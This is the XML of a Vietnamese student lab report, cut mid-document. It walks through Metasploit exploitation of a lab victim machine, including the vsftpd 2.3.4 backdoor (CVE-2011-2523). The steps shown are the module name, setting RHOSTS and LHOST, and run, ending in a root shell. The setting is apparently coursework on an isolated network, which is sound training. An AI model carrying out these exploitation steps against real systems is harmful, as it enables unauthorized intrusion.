          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>+)set LHOST 192.168.174.128 —--&gt; đặt giá trị của máy nhận giá trị kết nối từ máy trở về là địa chỉ của máy attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302EEDDE" w14:textId="6464B01A" w:rsidR="009F6BB0" w:rsidRDefault="009F6BB0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9F6BB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-Chạy module khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE687B4" w14:textId="77777777" w:rsidR="00CD0982" w:rsidRDefault="009F6BB0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CD0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;Các lệnh đã sử dụng: run —--&gt; chạy module khai thác —--&gt; lấy về shell của máy victim </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C4BE20" w14:textId="1260F011" w:rsidR="009F6BB0" w:rsidRPr="00CD0982" w:rsidRDefault="009F6BB0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 w:rsidRPr="00CD0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-Kết quả hậu khai thác —---&gt; lấy về shell của máy victim với đặc quyền roo</w:t>
      </w:r>
      <w:r w:rsidR="00CD0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5336712D" w14:textId="2284E78F" w:rsidR="00781DDB" w:rsidRDefault="00781DDB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CEE7C7" wp14:editId="2BE4CC30">
            <wp:extent cx="6353182" cy="22305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554" cy="22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48E6" w14:textId="77777777" w:rsidR="00CD0982" w:rsidRDefault="009F6BB0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9F6BB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;Các lệnh đã sử dụng: run —--&gt; chạy module khai thác —--&gt; lấy về shell của máy victim </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D47157E" w14:textId="45F0E1D3" w:rsidR="009F6BB0" w:rsidRPr="009F6BB0" w:rsidRDefault="009F6BB0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9F6BB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-Kết quả hậu khai thác —---&gt; lấy về shell của máy victim với đặc quyền root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219D2DFD" w14:textId="77777777" w:rsidR="00020369" w:rsidRPr="00BB3FD9" w:rsidRDefault="00020369" w:rsidP="002E2717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755D9BA" w14:textId="44B5B218" w:rsidR="00BB3FD9" w:rsidRDefault="00E17780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7.</w:t>
      </w:r>
      <w:r w:rsidR="00781DDB" w:rsidRPr="00781DDB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Khai thác cửa hậu trên Vsftpd v2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D201C9" w14:textId="5B95CD7B" w:rsidR="00020369" w:rsidRDefault="00020369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025233">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-Theo như kết quả quét từ nmap , máy victim đang chạy dịch vụ </w:t>
      </w:r>
      <w:r w:rsidR="00025233" w:rsidRPr="00025233">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vsftpd v2.3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00025233">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên </w:t>
      </w:r>
      <w:r w:rsidR="00025233" w:rsidRPr="00025233">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cổng 21</w:t>
      </w:r>
      <w:r w:rsidRPr="00025233">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF8CEF0" w14:textId="1EC10453" w:rsidR="00025233" w:rsidRDefault="00025233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71A82C9" wp14:editId="7F610FB8">
            <wp:extent cx="6397224" cy="15316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9367" cy="15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8F9" w14:textId="302201A4" w:rsidR="00CE4D11" w:rsidRDefault="00CE4D11" w:rsidP="00CE4D11">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4D11">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Tiến hành xác định lỗ hổng bảo mật của dịch vsftpd 2.3.4 đang chạy trên máy victim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CE4D11">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--&gt; lỗ hổ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4D11">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>g bảo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CE4D11">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mật : CVE -20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4D11">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-2523 (vsFTPd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CE4D11">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>version 2.3.4 back door)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A5B0DE" w14:textId="6B209C3D" w:rsidR="00D304C5" w:rsidRDefault="00D304C5" w:rsidP="00CE4D11">
      <w:pPr>
        <w:ind w:left="-426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6C448EC" wp14:editId="59E0407A">
            <wp:extent cx="6377940" cy="4038326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7221" cy="404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82AD" w14:textId="77777777" w:rsidR="00D3042A" w:rsidRPr="002E2717" w:rsidRDefault="00D3042A" w:rsidP="00D3042A">
      <w:pPr>
        <w:ind w:left="-426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9CA6FAF" wp14:editId="70BD34FA">
            <wp:extent cx="6395676" cy="9906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784" cy="9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717">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>=&gt;Lệnh đã sử dụng: search vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4F81F2" w14:textId="77777777" w:rsidR="002E2717" w:rsidRDefault="00D3042A" w:rsidP="00D3042A">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E2717">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-Sử dụng module khai thác </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A7F5D3" w14:textId="3E38CAE0" w:rsidR="00D3042A" w:rsidRPr="002E2717" w:rsidRDefault="00D3042A" w:rsidP="00D3042A">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E2717">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>---&gt; lệnh sử dụng : use</w:t>
      </w:r>
      <w:r w:rsidR="002E271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2E2717">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D551A2" w14:textId="51BBFEA9" w:rsidR="00D3042A" w:rsidRDefault="00D3042A" w:rsidP="00D3042A">
      <w:pPr>
        <w:ind w:left="-426"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34257076" wp14:editId="759531D7">
            <wp:extent cx="6458039" cy="76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1442" cy="7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9B46" w14:textId="77777777" w:rsidR="002E2717" w:rsidRDefault="00D3042A" w:rsidP="00D3042A">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3042A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>=&gt;Lệnh đã sử dụng: show payloads —</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5D1337" w14:textId="23CBC26D" w:rsidR="00D3042A" w:rsidRPr="00D3042A" w:rsidRDefault="00D3042A" w:rsidP="00D3042A">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3042A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; payload phù hợp : payload/cmd/unix/reverse </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC4A51C" w14:textId="14046DD9" w:rsidR="00D3042A" w:rsidRDefault="00D3042A" w:rsidP="00D3042A">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3042A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>set payload/cmd/unix/interact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB8CCCD" w14:textId="5281C3D7" w:rsidR="00025233" w:rsidRDefault="00B6353D" w:rsidP="00B6353D">
      <w:pPr>
        <w:ind w:left="-426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39599745" wp14:editId="16EFD879">
            <wp:extent cx="6376369" cy="2354580"/>
            <wp:effectExtent l="0" t="0" r="571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1040" cy="23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F66E" w14:textId="3F4E341F" w:rsidR="00B6353D" w:rsidRPr="002E2717" w:rsidRDefault="00B6353D" w:rsidP="00B6353D">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E2717">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-Set các tham số cho module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36327130" w14:textId="73D3BE47" w:rsidR="00B6353D" w:rsidRDefault="00B6353D" w:rsidP="00B6353D">
      <w:pPr>
        <w:ind w:left="-426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284FBA8" wp14:editId="27DA113B">
            <wp:extent cx="6433648" cy="18211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2952" cy="18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E6C" w14:textId="77777777" w:rsidR="00B6353D" w:rsidRPr="00B6353D" w:rsidRDefault="00B6353D" w:rsidP="00B6353D">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6353D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;Các lệnh đã sử dụng: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D378C53" w14:textId="34FDECC9" w:rsidR="00B6353D" w:rsidRPr="00B6353D" w:rsidRDefault="00B6353D" w:rsidP="00B6353D">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6353D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.174.129 —&gt; đặt giá trị cho tham số là địa chỉ ip của máy victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6EDB90" w14:textId="0C71ABCC" w:rsidR="007C4374" w:rsidRDefault="007C4374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7FD85D3D" w14:textId="6D27A899" w:rsidR="00B6353D" w:rsidRDefault="00B6353D" w:rsidP="009F6BB0">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6353D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-Chạy module khai thác:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B6353D">
        <w:rPr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0276A2F" wp14:editId="29EA7BCB">
            <wp:extent cx="6454612" cy="16992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900" cy="17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2F20" w14:textId="77777777" w:rsidR="00B6353D" w:rsidRPr="00B6353D" w:rsidRDefault="00B6353D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B6353D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;Các lệnh đã sử dụng: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275FC464" w14:textId="77777777" w:rsidR="00B6353D" w:rsidRPr="00B6353D" w:rsidRDefault="00B6353D" w:rsidP="009F6BB0">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6353D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">run —--&gt; chạy module khai thác —--&gt; lấy về shell của máy victim </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257BE6E0" w14:textId="24F2B320" w:rsidR="00B6353D" w:rsidRPr="00B6353D" w:rsidRDefault="00B6353D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  <w:r w:rsidRPr="00B6353D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-Kết quả hậu khai thác —---&gt; lấy về shell của máy victim với đặc quyền </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9DC7D5" w14:textId="2B0343C1" w:rsidR="007C4374" w:rsidRDefault="007C4374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1E2D95BD" w14:textId="77777777" w:rsidR="007C4374" w:rsidRPr="00781DDB" w:rsidRDefault="007C4374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p w14:paraId="3FEF98F1" w14:textId="77777777" w:rsidR="00E020DA" w:rsidRPr="00A8227A" w:rsidRDefault="00E020DA" w:rsidP="009F6BB0">
      <w:pPr>
        <w:ind w:left="-426"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E020DA" w:rsidRPr="00A8227A" w:rsidSect="002E2717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42DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B04597C"/>
    <w:lvl w:ilvl="0" w:tplc="7A6A9884">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="-66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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="243B2363"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B57CD09C"/>
    <w:lvl w:ilvl="0" w:tplc="CCF446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F6902"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="538804D8"/>
    <w:lvl w:ilvl="0" w:tplc="9AF075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C97172"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F9D62A60"/>
    <w:lvl w:ilvl="0" w:tplc="7108D7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973768">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="511262419">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1872836372">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1913200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7A"/>
    <w:rsid w:val="00020369"/>
    <w:rsid w:val="00025233"/>
    <w:rsid w:val="00087AA1"/>
    <w:rsid w:val="000959A0"/>
    <w:rsid w:val="000A7804"/>
    <w:rsid w:val="001747E6"/>
    <w:rsid w:val="001B0AA0"/>
    <w:rsid w:val="001E1D53"/>
    <w:rsid w:val="00250331"/>
    <w:rsid w:val="002E2717"/>
    <w:rsid w:val="002E599F"/>
    <w:rsid w:val="0048447B"/>
    <w:rsid w:val="004A2826"/>
    <w:rsid w:val="00781DDB"/>
    <w:rsid w:val="007C4374"/>
    <w:rsid w:val="00876CE9"/>
    <w:rsid w:val="0099268F"/>
    <w:rsid w:val="009F6BB0"/>
    <w:rsid w:val="00A8227A"/>
    <w:rsid w:val="00AF0EF6"/>
    <w:rsid w:val="00B6353D"/>
    <w:rsid w:val="00B63EAE"/>
    <w:rsid w:val="00B70D36"/>
    <w:rsid w:val="00BB3FD9"/>
    <w:rsid w:val="00C03FF2"/>
    <w:rsid w:val="00C5781C"/>
    <w:rsid w:val="00CD0982"/>
    <w:rsid w:val="00CE4D11"/>
    <w:rsid w:val="00D3042A"/>
    <w:rsid w:val="00D304C5"/>
    <w:rsid w:val="00E020DA"/>
    <w:rsid w:val="00E1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9754D5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9A44BF4C-5694-49D5-9B81-9FDC7CF3E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B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0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TRUNG KIEN D20AT02</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>HOANG TRUNG KIEN D20AT02</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-24T09:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-25T14:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>